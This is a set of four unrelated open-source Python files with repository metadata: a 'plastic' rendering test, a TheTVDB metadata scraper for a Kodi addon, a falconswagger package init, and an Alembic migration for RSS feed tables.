import json import re from attest import Tests, assert_hook from werkzeug.test import Client from werkzeug.wrappers import Response from plastic.app import BaseApp from plastic.rendering import render RenderingTestApp = BaseApp.clone() RenderingTestApp.associate_mimetypes(html='text/html', xml='text/xml') @RenderingTestApp.serializer('application/json') def serialize_json(request, value): return json.dumps(value) @RenderingTestApp.template_engine('t1') def t1(request, path, values): with request.app.template_directory[path] as template: return template.read().format(request=request, **values) @RenderingTestApp.route('/') def home(request): return render(request, {'pi': 3.14}, 'home', pi=3.14) tests = Tests() @tests.test def render_(): client = Client(RenderingTestApp(), Response) response = client.get('/', headers=[('Accept', 'text/html')]) assert response.data.strip() == '<h1>3.14</h1>' assert response.mimetype == 'text/html' assert 'Accept' in response.vary response = client.get('/', headers=[('Accept', 'text/xml')]) assert response.data.strip() == '<pi value="3.14"/>' assert response.mimetype == 'text/xml' assert 'Accept' in response.vary response = client.get('/', headers=[('Accept', 'application/json')]) assert json.loads(response.data)['pi'] == 3.14 assert response.mimetype == 'application/json' assert 'Accept' in response.vary response = client.get('/', headers=[('Accept', 'text/plain')]) assert response.status_code == 406
dahlia/plastic
plastictests/rendering.py
Python
mit
1,548
# -*- coding: utf-8 -*- # ------------------------------------------------------------ # tvdb # ------------------------------------------------------------ # Scraper para el site thetvdb.com usando API v2.1 # Utilizado para obtener datos de series para la videoteca # del addon y también Kodi. # ------------------------------------------------------------ import re import urllib2 from core import jsontools from core import scrapertools from core.item import InfoLabels from platformcode import config, logger from platformcode import platformtools HOST = "https://api.thetvdb.com" HOST_IMAGE = "http://thetvdb.com/banners/" TOKEN = config.get_setting("tvdb_token", default="") DEFAULT_LANG = "es" DEFAULT_HEADERS = { 'Content-Type': 'application/json', 'Accept': 'application/json, application/vnd.thetvdb.v2.1.1', 'Accept-Language': DEFAULT_LANG, 'Authorization': 'Bearer ' + TOKEN, } # Traducciones - Inicio DICT_STATUS = {'Continuing': 'En emisión', 'Ended': 'Finalizada'} DICT_GENRE = { 'Action': 'Acción', 'Adventure': 'Aventura', 'Animation': 'Animación', 'Children': 'Niños', 'Comedy': 'Comedia', 'Crime': 'Crimen', 'Documentary': 'Documental', # 'Drama': 'Drama', 'Family': 'Familiar', 'Fantasy': 'Fantasía', 'Food': 'Comida', 'Game Show': 'Concurso', 'Home and Garden': 'Hogar y Jardín', # 'Horror': 'Horror', 'Mini-Series': 'Mini-Series', 'Mystery': 'Misterio', 'News': 'Noticias', # 'Reality': 'Telerrealidad', 'Romance': 'Romántico', 'Science-Fiction': 'Ciencia-Ficción', 'Soap': 'Telenovela', # 'Special Interest': 'Special Interest', 'Sport': 'Deporte', # 'Suspense': 'Suspense', 'Talk Show': 'Programa de Entrevistas', # 'Thriller': 'Thriller', 'Travel': 'Viaje', # 'Western': 'Western' } DICT_MPAA = {'TV-Y': 'Público pre-infantil: niños menores de 6 años', 'TV-Y7': 'Público infantil: desde 7 años', 'TV-G': 'Público general: sin supervisión familiar', 'TV-PG': 'Guía paterna: Supervisión paternal', 'TV-14': 'Mayores de 14 años', 'TV-MA': 'Mayores de 17 años'} # Traducciones - Fin otvdb_global = None def find_and_set_infoLabels(item): logger.info() # logger.info("item es %s" % item) p_dialog = None if not item.contentSeason: p_dialog = platformtools.dialog_progress_bg("Buscando información de la serie", "Espere por favor...") global otvdb_global tvdb_result = None title = item.contentSerieName # Si el titulo incluye el (año) se lo quitamos year = scrapertools.find_single_match(title, "^.+?\s*(\(\d{4}\))$") if year: title = title.replace(year, "").strip() item.infoLabels['year'] = year[1:-1] if not item.infoLabels.get("tvdb_id"): if not item.infoLabels.get("imdb_id"): otvdb_global = Tvdb(search=title, year=item.infoLabels['year']) else: otvdb_global = Tvdb(imdb_id=item.infoLabels.get("imdb_id")) elif not otvdb_global or otvdb_global.get_id() != item.infoLabels['tvdb_id']: otvdb_global = Tvdb(tvdb_id=item.infoLabels['tvdb_id']) if not item.contentSeason: p_dialog.update(50, "Buscando información de la serie", "Obteniendo resultados...") results, info_load = otvdb_global.get_list_results() logger.debug("results es %s" % results) if not item.contentSeason: p_dialog.update(100, "Buscando información de la serie", "Encontrados %s posibles coincidencias" % len(results)) p_dialog.close() if len(results) > 1: tvdb_result = platformtools.show_video_info(results, item=item, scraper=Tvdb, caption="[%s]: Selecciona la serie correcta" % title) elif len(results) > 0: tvdb_result = results[0] # todo revisar if isinstance(item.infoLabels, InfoLabels): logger.debug("es instancia de infoLabels") infoLabels = item.infoLabels else: logger.debug("NO ES instancia de infoLabels") infoLabels = InfoLabels() if tvdb_result: infoLabels['tvdb_id'] = tvdb_result['id'] infoLabels['url_scraper'] = ["http://thetvdb.com/index.php?tab=series&id=%s" % infoLabels['tvdb_id']] if not info_load: if otvdb_global.get_id() != infoLabels['tvdb_id']: otvdb_global = Tvdb(tvdb_id=infoLabels['tvdb_id']) otvdb_global.get_images(infoLabels['tvdb_id'], image="poster") otvdb_global.get_images(infoLabels['tvdb_id'], image="fanart") otvdb_global.get_tvshow_cast(infoLabels['tvdb_id']) item.infoLabels = infoLabels set_infoLabels_item(item) return True else: item.infoLabels = infoLabels return False def set_infoLabels_item(item): """ Obtiene y fija (item.infoLabels) los datos extras de una serie, capitulo o pelicula. @param item: Objeto que representa un pelicula, serie o capitulo. El atributo infoLabels sera modificado incluyendo los datos extras localizados. @type item: Item """ global otvdb_global def __leer_datos(otvdb_aux): item.infoLabels = otvdb_aux.get_infoLabels(item.infoLabels) if 'infoLabels' in item and 'thumbnail' in item.infoLabels: item.thumbnail = item.infoLabels['thumbnail'] if 'infoLabels' in item and 'fanart' in item.infoLabels['fanart']: item.fanart = item.infoLabels['fanart'] if 'infoLabels' in item and 'season' in item.infoLabels: try: int_season = int(item.infoLabels['season']) except ValueError: logger.debug("El numero de temporada no es valido") item.contentType = item.infoLabels['mediatype'] return -1 * len(item.infoLabels) if not otvdb_global or \ (item.infoLabels['tvdb_id'] and otvdb_global.get_id() != item.infoLabels['tvdb_id']) \ or (otvdb_global.search_name and otvdb_global.search_name != item.infoLabels['tvshowtitle']): if item.infoLabels['tvdb_id']: otvdb_global = Tvdb(tvdb_id=item.infoLabels['tvdb_id']) else: otvdb_global = Tvdb(search=item.infoLabels['tvshowtitle']) __leer_datos(otvdb_global) if item.infoLabels['episode']: try: int_episode = int(item.infoLabels['episode']) except ValueError: logger.debug("El número de episodio (%s) no es valido" % repr(item.infoLabels['episode'])) item.contentType = item.infoLabels['mediatype'] return -1 * len(item.infoLabels) # Tenemos numero de temporada y numero de episodio validos... # ... buscar datos episodio item.infoLabels['mediatype'] = 'episode' lang = DEFAULT_LANG if otvdb_global.lang: lang = otvdb_global.lang page = 1 _id = None while not _id: list_episodes = otvdb_global.list_episodes.get(page) if not list_episodes: list_episodes = otvdb_global.get_list_episodes(otvdb_global.get_id(), page) import threading semaforo = threading.Semaphore(20) l_hilo = list() for e in list_episodes["data"]: t = threading.Thread(target=otvdb_global.get_episode_by_id, args=(e["id"], lang, semaforo)) t.start() l_hilo.append(t) # esperar q todos los hilos terminen for x in l_hilo: x.join() for e in list_episodes['data']: if e['airedSeason'] == int_season and e['airedEpisodeNumber'] == int_episode: _id = e['id'] break _next = list_episodes['links']['next'] if type(_next) == int: page = _next else: break data_episode = otvdb_global.get_info_episode(otvdb_global.get_id(), int_season, int_episode, lang, _id) # todo repasar valores que hay que insertar en infoLabels if data_episode: item.infoLabels['title'] = data_episode['episodeName'] # fix en casos que el campo desde la api era null--> None if data_episode["overview"] is not None: item.infoLabels['plot'] = data_episode["overview"] item.thumbnail = HOST_IMAGE + data_episode.get('filename', "") item.infoLabels["rating"] = data_episode.get("siteRating", "") item.infoLabels['director'] = ', '.join(sorted(data_episode.get('directors', []))) item.infoLabels['writer'] = ', '.join(sorted(data_episode.get("writers", []))) if data_episode["firstAired"]: item.infoLabels['premiered'] = data_episode["firstAired"].split("-")[2] + "/" + \ data_episode["firstAired"].split("-")[1] + "/" + \ data_episode["firstAired"].split("-")[0] item.infoLabels['aired'] = item.infoLabels['premiered'] guest_stars = data_episode.get("guestStars", []) l_castandrole = item.infoLabels.get("castandrole", []) l_castandrole.extend([(p, '') for p in guest_stars]) item.infoLabels['castandrole'] = l_castandrole # datos para nfo item.season_id = data_episode["airedSeasonID"] item.episode_id = data_episode["id"] return len(item.infoLabels) else: # Tenemos numero de temporada valido pero no numero de episodio... # ... buscar datos temporada item.infoLabels['mediatype'] = 'season' data_season = otvdb_global.get_images(otvdb_global.get_id(), "season", int_season) if data_season and 'image_season_%s' % int_season in data_season: item.thumbnail = HOST_IMAGE + data_season['image_season_%s' % int_season][0]['fileName'] return len(item.infoLabels) # Buscar... else: # Busquedas por ID... if (not otvdb_global or otvdb_global.get_id() != item.infoLabels['tvdb_id']) and item.infoLabels['tvdb_id']: otvdb_global = Tvdb(tvdb_id=item.infoLabels['tvdb_id']) elif not otvdb_global and item.infoLabels['imdb_id']: otvdb_global = Tvdb(imdb_id=item.infoLabels['imdb_id']) elif not otvdb_global and item.infoLabels['zap2it_id']: otvdb_global = Tvdb(zap2it_id=item.infoLabels['zap2it_id']) # No se ha podido buscar por ID... se hace por título if otvdb_global is None: otvdb_global = Tvdb(search=item.infoLabels['tvshowtitle']) if otvdb_global and otvdb_global.get_id(): __leer_datos(otvdb_global) # La busqueda ha encontrado un resultado valido return len(item.infoLabels) def get_nfo(item): """ Devuelve la información necesaria para que se scrapee el resultado en la videoteca de kodi, @param item: elemento que contiene los datos necesarios para generar la info @type item: Item @rtype: str @return: """ if "season" in item.infoLabels and "episode" in item.infoLabels: info_nfo = "http://thetvdb.com/?tab=episode&seriesid=%s&seasonid=%s&id=%s\n" \ % (item.infoLabels['tvdb_id'], item.season_id, item.episode_id) else: info_nfo = ', '.join(item.infoLabels['url_scraper']) + "\n" return info_nfo def completar_codigos(item): """ Si es necesario comprueba si existe el identificador de tmdb y sino existe trata de buscarlo @param item: tipo item @type item: Item """ if not item.infoLabels['tmdb_id']: listsources = [(item.infoLabels['tvdb_id'], "tvdb_id")] if item.infoLabels['imdb_id']: listsources.append((item.infoLabels['imdb_id'], "imdb_id")) from core.tmdb import Tmdb ob = Tmdb() for external_id, external_source in listsources: ob.search_by_id(id=external_id, source=external_source, tipo='tv') item.infoLabels['tmdb_id'] = ob.get_id() if item.infoLabels['tmdb_id']: url_scraper = "https://www.themoviedb.org/tv/%s" % item.infoLabels['tmdb_id'] item.infoLabels['url_scraper'].append(url_scraper) break class Tvdb: def __init__(self, **kwargs): self.__check_token() self.result = {} self.list_results = [] self.lang = "" self.search_name = kwargs['search'] = \ re.sub('\[\\\?(B|I|COLOR)\s?[^\]]*\]', '', kwargs.get('search', '')) self.list_episodes = {} self.episodes = {} if kwargs.get('tvdb_id', ''): # Busqueda por identificador tvdb self.__get_by_id(kwargs.get('tvdb_id', '')) if not self.list_results and config.get_setting("tvdb_retry_eng", "videolibrary"): from platformcode import platformtools platformtools.dialog_notification("No se ha encontrado en idioma '%s'" % DEFAULT_LANG, "Se busca en idioma 'en'", sound=False) self.__get_by_id(kwargs.get('tvdb_id', ''), "en") self.lang = "en" elif self.search_name: # Busqueda por texto self.__search(kwargs.get('search', ''), kwargs.get('imdb_id', ''), kwargs.get('zap2it_id', '')) if not self.list_results and config.get_setting("tvdb_retry_eng", "videolibrary"): from platformcode import platformtools platformtools.dialog_notification("No se ha encontrado en idioma '%s'" % DEFAULT_LANG, "Se busca en idioma 'en'") self.__search(kwargs.get('search', ''), kwargs.get('imdb_id', ''), kwargs.get('zap2it_id', ''), "en") self.lang = "en" if not self.result: # No hay resultados de la busqueda if kwargs.get('tvdb_id', ''): buscando = kwargs.get('tvdb_id', '') else: buscando = kwargs.get('search', '') msg = "La busqueda de %s no dio resultados." % buscando logger.debug(msg) @classmethod def __check_token(cls): # logger.info() if TOKEN == "": cls.__login() else: # si la fecha no se corresponde con la actual llamamos a refresh_token, ya que el token expira en 24 horas from time import gmtime, strftime current_date = strftime("%Y-%m-%d", gmtime()) if config.get_setting("tvdb_token_date", "") != current_date: # si se ha renovado el token grabamos la nueva fecha if cls.__refresh_token(): config.set_setting("tvdb_token_date", current_date) @staticmethod def __login(): # logger.info() global TOKEN apikey = "106B699FDC04301C" url = HOST + "/login" params = {"apikey": apikey} try: req = urllib2.Request(url, data=jsontools.dump(params), headers=DEFAULT_HEADERS) response = urllib2.urlopen(req) html = response.read() response.close() except Exception, ex: message = "An exception of type %s occured. Arguments:\n%s" % (type(ex).__name__, repr(ex.args)) logger.error("error en: %s" % message) else: dict_html = jsontools.load(html) # logger.debug("dict_html %s" % dict_html) if "token" in dict_html: token = dict_html["token"] DEFAULT_HEADERS["Authorization"] = "Bearer " + token TOKEN = config.set_setting("tvdb_token", token) @classmethod def __refresh_token(cls): # logger.info() global TOKEN is_success = False url = HOST + "/refresh_token" try: req = urllib2.Request(url, headers=DEFAULT_HEADERS) response = urllib2.urlopen(req) html = response.read() response.close() except urllib2.HTTPError, err: logger.error("err.code es %s" % err.code) # si hay error 401 es que el token se ha pasado de tiempo y tenemos que volver a llamar a login if err.code == 401: cls.__login() else: raise except Exception, ex: message = "An exception of type %s occured. Arguments:\n%s" % (type(ex).__name__, repr(ex.args)) logger.error("error en: %s" % message) else: dict_html = jsontools.load(html) # logger.error("tokencito %s" % dict_html) if "token" in dict_html: token = dict_html["token"] DEFAULT_HEADERS["Authorization"] = "Bearer " + token TOKEN = config.set_setting("tvdb_token", token) is_success = True return is_success def get_info_episode(self, _id, season=1, episode=1, lang=DEFAULT_LANG, id_episode=None): """ Devuelve los datos de un episodio. @param _id: identificador de la serie @type _id: str @param season: numero de temporada [por defecto = 1] @type season: int @param episode: numero de episodio [por defecto = 1] @type episode: int @param lang: codigo de idioma para buscar @type lang: str @param id_episode: codigo del episodio. @type id_episode: int @rtype: dict @return: "data": { "id": 0, "airedSeason": 0, "airedEpisodeNumber": 0, "episodeName": "string", "firstAired": "string", "guestStars": [ "string" ], "director": "string", # deprecated "directors": [ "string" ], "writers": [ "string" ], "overview": "string", "productionCode": "string", "showUrl": "string", "lastUpdated": 0, "dvdDiscid": "string", "dvdSeason": 0, "dvdEpisodeNumber": 0, "dvdChapter": 0, "absoluteNumber": 0, "filename": "string", "seriesId": "string", "lastUpdatedBy": "string", "airsAfterSeason": 0, "airsBeforeSeason": 0, "airsBeforeEpisode": 0, "thumbAuthor": 0, "thumbAdded": "string", "thumbWidth": "string", "thumbHeight": "string", "imdbId": "string", "siteRating": 0, "siteRatingCount": 0 }, "errors": { "invalidFilters": [ "string" ], "invalidLanguage": "string", "invalidQueryParams": [ "string" ] } """ logger.info() if id_episode and self.episodes.get(id_episode): return self.episodes.get(id_episode) params = {"airedSeason": "%s" % season, "airedEpisode": "%s" % episode} try: import urllib params = urllib.urlencode(params) url = HOST + "/series/%s/episodes/query?%s" % (_id, params) DEFAULT_HEADERS["Accept-Language"] = lang logger.debug("url: %s, \nheaders: %s" % (url, DEFAULT_HEADERS)) req = urllib2.Request(url, headers=DEFAULT_HEADERS) response = urllib2.urlopen(req) html = response.read() response.close() except Exception, ex: message = "An exception of type %s occured. Arguments:\n%s" % (type(ex).__name__, repr(ex.args)) logger.error("error en: %s" % message) else: dict_html = jsontools.load(html) if "data" in dict_html and "id" in dict_html["data"][0]: self.get_episode_by_id(dict_html["data"][0]["id"], lang) return dict_html["data"] def get_list_episodes(self, _id, page=1): """ Devuelve el listado de episodios de una serie. @param _id: identificador de la serie @type _id: str @param page: numero de pagina a buscar [por defecto = 1] @type page: int @rtype: dict @return: { "links": { "first": 0, "last": 0, "next": 0, "previous": 0 }, "data": [ { "absoluteNumber": 0, "airedEpisodeNumber": 0, "airedSeason": 0, "dvdEpisodeNumber": 0, "dvdSeason": 0, "episodeName": "string", "id": 0, "overview": "string", "firstAired": "string", "lastUpdated": 0 } ], "errors": { "invalidFilters": [ "string" ], "invalidLanguage": "string", "invalidQueryParams": [ "string" ] } } """ logger.info() try: url = HOST + "/series/%s/episodes?page=%s" % (_id, page) logger.debug("url: %s, \nheaders: %s" % (url, DEFAULT_HEADERS)) req = urllib2.Request(url, headers=DEFAULT_HEADERS) response = urllib2.urlopen(req) html = response.read() response.close() except Exception, ex: message = "An exception of type %s occured. Arguments:\n%s" % (type(ex).__name__, repr(ex.args)) logger.error("error en: %s" % message) else: self.list_episodes[page] = jsontools.load(html) # logger.info("dict_html %s" % self.list_episodes) return self.list_episodes[page] def get_episode_by_id(self, _id, lang=DEFAULT_LANG, semaforo=None): """ Obtiene los datos de un episodio @param _id: identificador del episodio @type _id: str @param lang: código de idioma @param semaforo: semaforo para multihilos @type semaforo: threading.Semaphore @type lang: str @rtype: dict @return: { "data": { "id": 0, "airedSeason": 0, "airedEpisodeNumber": 0, "episodeName": "string", "firstAired": "string", "guestStars": [ "string" ], "director": "string", "directors": [ "string" ], "writers": [ "string" ], "overview": "string", "productionCode": "string", "showUrl": "string", "lastUpdated": 0, "dvdDiscid": "string", "dvdSeason": 0, "dvdEpisodeNumber": 0, "dvdChapter": 0, "absoluteNumber": 0, "filename": "string", "seriesId": "string", "lastUpdatedBy": "string", "airsAfterSeason": 0, "airsBeforeSeason": 0, "airsBeforeEpisode": 0, "thumbAuthor": 0, "thumbAdded": "string", "thumbWidth": "string", "thumbHeight": "string", "imdbId": "string", "siteRating": 0, "siteRatingCount": 0 }, "errors": { "invalidFilters": [ "string" ], "invalidLanguage": "string", "invalidQueryParams": [ "string" ] } } """ if semaforo: semaforo.acquire() logger.info() url = HOST + "/episodes/%s" % _id try: DEFAULT_HEADERS["Accept-Language"] = lang logger.debug("url: %s, \nheaders: %s" % (url, DEFAULT_HEADERS)) req = urllib2.Request(url, headers=DEFAULT_HEADERS) response = urllib2.urlopen(req) html = response.read() response.close() except Exception, ex: if type(ex) == urllib2.HTTPError: logger.debug("code es %s " % ex.code) message = "An exception of type %s occured. Arguments:\n%s" % (type(ex).__name__, repr(ex.args)) logger.error("error en: %s" % message) else: dict_html = jsontools.load(html) dict_html = dict_html.pop("data") logger.info("dict_html %s" % dict_html) self.episodes[_id] = dict_html if semaforo: semaforo.release() def __search(self, name, imdb_id, zap2it_id, lang=DEFAULT_LANG): """ Busca una serie a través de una serie de parámetros. @param name: nombre a buscar @type name: str @param imdb_id: codigo identificativo de imdb @type imdb_id: str @param zap2it_id: codigo identificativo de zap2it @type zap2it_id: str @param lang: código de idioma @type lang: str data:{ "aliases": [ "string" ], "banner": "string", "firstAired": "string", "id": 0, "network": "string", "overview": "string", "seriesName": "string", "status": "string" } """ logger.info() try: params = {} if name: params["name"] = name elif imdb_id: params["imdbId"] = imdb_id elif zap2it_id: params["zap2itId"] = zap2it_id import urllib params = urllib.urlencode(params) DEFAULT_HEADERS["Accept-Language"] = lang url = HOST + "/search/series?%s" % params logger.debug("url: %s, \nheaders: %s" % (url, DEFAULT_HEADERS)) req = urllib2.Request(url, headers=DEFAULT_HEADERS) response = urllib2.urlopen(req) html = response.read() response.close() except Exception, ex: if type(ex) == urllib2.HTTPError: logger.debug("code es %s " % ex.code) message = "An exception of type %s occured. Arguments:\n%s" % (type(ex).__name__, repr(ex.args)) logger.error("error en: %s" % message) else: dict_html = jsontools.load(html) if "errors" in dict_html and "invalidLanguage" in dict_html["errors"]: # no hay información en idioma por defecto return else: resultado = dict_html["data"] # todo revisar if len(resultado) > 1: index = 0 else: index = 0 logger.debug("resultado %s" % resultado) self.list_results = resultado self.result = resultado[index] def __get_by_id(self, _id, lang=DEFAULT_LANG, from_get_list=False): """ Obtiene los datos de una serie por identificador. @param _id: código de la serie @type _id: str @param lang: código de idioma @type lang: str @rtype: dict @return: { "data": { "id": 0, "seriesName": "string", "aliases": [ "string" ], "banner": "string", "seriesId": 0, "status": "string", "firstAired": "string", "network": "string", "networkId": "string", "runtime": "string", "genre": [ "string" ], "overview": "string", "lastUpdated": 0, "airsDayOfWeek": "string", "airsTime": "string", "rating": "string", "imdbId": "string", "zap2itId": "string", "added": "string", "siteRating": 0, "siteRatingCount": 0 }, "errors": { "invalidFilters": [ "string" ], "invalidLanguage": "string", "invalidQueryParams": [ "string" ] } } """ logger.info() resultado = {} url = HOST + "/series/%s" % _id try: DEFAULT_HEADERS["Accept-Language"] = lang req = urllib2.Request(url, headers=DEFAULT_HEADERS) logger.debug("url: %s, \nheaders: %s" % (url, DEFAULT_HEADERS)) response = urllib2.urlopen(req) html = response.read() response.close() except Exception, ex: if type(ex) == urllib2.HTTPError: logger.debug("code es %s " % ex.code) message = "An exception of type %s occured. Arguments:\n%s" % (type(ex).__name__, repr(ex.args)) logger.error("error en: %s" % message) else: dict_html = jsontools.load(html) if "errors" in dict_html and "invalidLanguage" in dict_html["errors"]: return {} else: resultado1 = dict_html["data"] if not resultado1 and from_get_list: return self.__get_by_id(_id, "en") logger.debug("resultado %s" % dict_html) resultado2 = {"image_poster": [{'keyType': 'poster', 'fileName': 'posters/%s-1.jpg' % _id}]} resultado3 = {"image_fanart": [{'keyType': 'fanart', 'fileName': 'fanart/original/%s-1.jpg' % _id}]} resultado = resultado1.copy() resultado.update(resultado2) resultado.update(resultado3) logger.debug("resultado total %s" % resultado) self.list_results = [resultado] self.result = resultado return resultado def get_images(self, _id, image="poster", season=1, lang="en"): """ Obtiene un tipo de imagen para una serie para un idioma. @param _id: identificador de la serie @type _id: str @param image: codigo de busqueda, ["poster" (por defecto), "fanart", "season"] @type image: str @type season: numero de temporada @param lang: código de idioma para el que se busca @type lang: str @return: diccionario con el tipo de imagenes elegidas. @rtype: dict """ logger.info() if self.result.get('image_season_%s' % season): return self.result['image_season_%s' % season] params = {} if image == "poster": params["keyType"] = "poster" elif image == "fanart": params["keyType"] = "fanart" params["subKey"] = "graphical" elif image == "season": params["keyType"] = "season" params["subKey"] = "%s" % season image += "_%s" % season try: import urllib params = urllib.urlencode(params) DEFAULT_HEADERS["Accept-Language"] = lang url = HOST + "/series/%s/images/query?%s" % (_id, params) logger.debug("url: %s, \nheaders: %s" % (url, DEFAULT_HEADERS)) req = urllib2.Request(url, headers=DEFAULT_HEADERS) response = urllib2.urlopen(req) html = response.read() response.close() except Exception, ex: message = "An exception of type %s occured. Arguments:\n%s" % (type(ex).__name__, repr(ex.args)) logger.error("error en: %s" % message) return {} else: dict_html = jsontools.load(html) dict_html["image_" + image] = dict_html.pop("data") self.result.update(dict_html) return dict_html def get_tvshow_cast(self, _id, lang=DEFAULT_LANG): """ obtiene el casting de una serie @param _id: codigo de la serie @type _id: str @param lang: codigo idioma para buscar @type lang: str @return: diccionario con los actores @rtype: dict """ logger.info() url = HOST + "/series/%s/actors" % _id DEFAULT_HEADERS["Accept-Language"] = lang logger.debug("url: %s, \nheaders: %s" % (url, DEFAULT_HEADERS)) req = urllib2.Request(url, headers=DEFAULT_HEADERS) response = urllib2.urlopen(req) html = response.read() response.close() dict_html = jsontools.load(html) dict_html["cast"] = dict_html.pop("data") self.result.update(dict_html) def get_id(self): """ @return: Devuelve el identificador Tvdb de la serie cargada o una cadena vacia en caso de que no hubiese nada cargado. Se puede utilizar este metodo para saber si una busqueda ha dado resultado o no. @rtype: str """ return str(self.result.get('id', "")) def get_list_results(self): """ Devuelve los resultados encontramos para una serie. @rtype: list @return: lista de resultados """ logger.info() list_results = [] # TODO revisar condicion # si tenemos un resultado y tiene seriesName, ya tenemos la info de la serie, no hace falta volver a buscar if len(self.list_results) == 1 and "seriesName" in self.result: list_results.append(self.result) info_load = True else: import threading semaforo = threading.Semaphore(20) l_hilo = list() r_list = list() def sub_thread(_id, i): semaforo.acquire() ret = self.__get_by_id(_id, DEFAULT_LANG, True) semaforo.release() r_list.append((ret, i)) for index, e in enumerate(self.list_results): t = threading.Thread(target=sub_thread, args=(e["id"], index)) t.start() l_hilo.append(t) for x in l_hilo: x.join() r_list.sort(key=lambda i: i[1]) list_results = [ii[0] for ii in r_list] info_load = False return list_results, info_load def get_infoLabels(self, infoLabels=None, origen=None): """ @param infoLabels: Informacion extra de la pelicula, serie, temporada o capitulo. @type infoLabels: dict @param origen: Diccionario origen de donde se obtiene los infoLabels, por omision self.result @type origen: dict @return: Devuelve la informacion extra obtenida del objeto actual. Si se paso el parametro infoLables, el valor devuelto sera el leido como parametro debidamente actualizado. @rtype: dict """ # TODO revisar if infoLabels: # logger.debug("es instancia de infoLabels") ret_infoLabels = InfoLabels(infoLabels) else: # logger.debug("NO ES instancia de infoLabels") ret_infoLabels = InfoLabels() # fix ret_infoLabels['mediatype'] = 'tvshow' # Iniciar listados l_castandrole = ret_infoLabels.get('castandrole', []) # logger.debug("self.result %s" % self.result) if not origen: origen = self.result # todo revisar # if 'credits' in origen.keys(): # dic_origen_credits = origen['credits'] # origen['credits_cast'] = dic_origen_credits.get('cast', []) # origen['credits_crew'] = dic_origen_credits.get('crew', []) # del origen['credits'] items = origen.items() for k, v in items: if not v: continue if k == 'overview': ret_infoLabels['plot'] = v elif k == 'runtime': ret_infoLabels['duration'] = int(v) * 60 elif k == 'firstAired': ret_infoLabels['year'] = int(v[:4]) ret_infoLabels['premiered'] = v.split("-")[2] + "/" + v.split("-")[1] + "/" + v.split("-")[0] # todo revisar # elif k == 'original_title' or k == 'original_name': # ret_infoLabels['originaltitle'] = v elif k == 'siteRating': ret_infoLabels['rating'] = float(v) elif k == 'siteRatingCount': ret_infoLabels['votes'] = v elif k == 'status': # se traduce los estados de una serie ret_infoLabels['status'] = DICT_STATUS.get(v, v) # no soy partidario de poner la cadena como studio pero es como lo hace el scraper de manera genérica elif k == 'network': ret_infoLabels['studio'] = v elif k == 'image_poster': # obtenemos la primera imagen de la lista ret_infoLabels['thumbnail'] = HOST_IMAGE + v[0]['fileName'] elif k == 'image_fanart': # obtenemos la primera imagen de la lista ret_infoLabels['fanart'] = HOST_IMAGE + v[0]['fileName'] # # no disponemos de la imagen de fondo # elif k == 'banner': # ret_infoLabels['fanart'] = HOST_IMAGE + v elif k == 'id': ret_infoLabels['tvdb_id'] = v elif k == 'imdbId': ret_infoLabels['imdb_id'] = v # no se muestra # ret_infoLabels['code'] = v elif k in "rating": # traducimos la clasificación por edades (content rating system) ret_infoLabels['mpaa'] = DICT_MPAA.get(v, v) elif k in "genre": genre_list = "" for index, i in enumerate(v): if index > 0: genre_list += ", " # traducimos los generos genre_list += DICT_GENRE.get(i, i) ret_infoLabels['genre'] = genre_list elif k == 'seriesName': # or k == 'name' or k == 'title': # if len(origen.get('aliases', [])) > 0: # ret_infoLabels['title'] = v + " " + origen.get('aliases', [''])[0] # else: # ret_infoLabels['title'] = v # logger.info("el titulo es %s " % ret_infoLabels['title']) ret_infoLabels['title'] = v elif k == 'cast': dic_aux = dict((name, character) for (name, character) in l_castandrole) l_castandrole.extend([(p['name'], p['role']) for p in v if p['name'] not in dic_aux.keys()]) else: logger.debug("Atributos no añadidos: %s=%s" % (k, v)) pass # Ordenar las listas y convertirlas en str si es necesario if l_castandrole: ret_infoLabels['castandrole'] = l_castandrole logger.debug("ret_infoLabels %s" % ret_infoLabels) return ret_infoLabels
pitunti/alfaPitunti
plugin.video.alfa/core/tvdb.py
Python
gpl-3.0
40,140
from falconswagger.swagger_api import SwaggerAPI from falconswagger.models.http import ModelHttpMeta
dutradda/falcon-swagger
falconswagger/__init__.py
Python
mit
100
"""RSS moar columns Revision ID: 1dc0fe0d793f Revises: 3389071120cb Create Date: 2017-02-28 06:49:26.443860 """ # revision identifiers, used by Alembic. revision = '1dc0fe0d793f' down_revision = '3389071120cb' branch_labels = None depends_on = None # Patch in knowledge of the citext type, so it reflects properly. import citext from sqlalchemy.dialects.postgresql.base import ischema_names ischema_names['citext'] = citext.CIText from sqlalchemy.dialects import postgresql import sqlalchemy as sa import sqlalchemy_utils import urllib.parse from alembic import op from flask_sqlalchemy import _SessionSignalEvents import sqlalchemy as sa from sqlalchemy import event from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.orm import sessionmaker, Session as BaseSession, relationship from sqlalchemy import Table from sqlalchemy import Column from sqlalchemy import BigInteger from sqlalchemy import Integer from sqlalchemy import Text from sqlalchemy import Float from sqlalchemy import Boolean from sqlalchemy import DateTime from sqlalchemy import ForeignKey from sqlalchemy import PrimaryKeyConstraint from sqlalchemy import UniqueConstraint from sqlalchemy.orm import relationship from sqlalchemy.schema import UniqueConstraint Session = sessionmaker() Base = declarative_base() class RssFeedPost(Base): __tablename__ = 'feed_pages' id = Column(BigInteger, primary_key=True) feed_id = Column(BigInteger, ForeignKey('rss_parser_funcs.id'), index = True, nullable=False) srcname = Column(Text, nullable=False, index=True) feedurl = Column(Text, nullable=False, index=True) class RssFeedUrlMapper(Base): __versioned__ = {} __tablename__ = 'rss_parser_feed_name_lut' name = 'rss_parser_feed_name_lut' id = Column(BigInteger, primary_key = True, index = True) feed_netloc = Column(Text, nullable = False, index = True) feed_url = Column(Text, nullable = False, index = True) feed_id = Column(BigInteger, ForeignKey('rss_parser_funcs.id'), nullable = False, index = True) __table_args__ = ( UniqueConstraint('feed_netloc', 'feed_id'), ) class RssFeedEntry(Base): __versioned__ = {} __tablename__ = 'rss_parser_funcs' name = 'rss_parser_funcs' id = Column(BigInteger, primary_key = True, index = True) version = Column(Integer, default='0') feed_name = Column(Text, nullable = False, index = True, unique = True) enabled = Column(Boolean, default=True) func = Column(Text) urls = relationship('RssFeedUrlMapper', backref='rss_parser_funcs') releases = relationship('RssFeedPost', backref='rss_parser_funcs')
fake-name/ReadableWebProxy
alembic/versions/00039_1dc0fe0d793f_rss_moar_columns.py
Python
bsd-3-clause
2,769
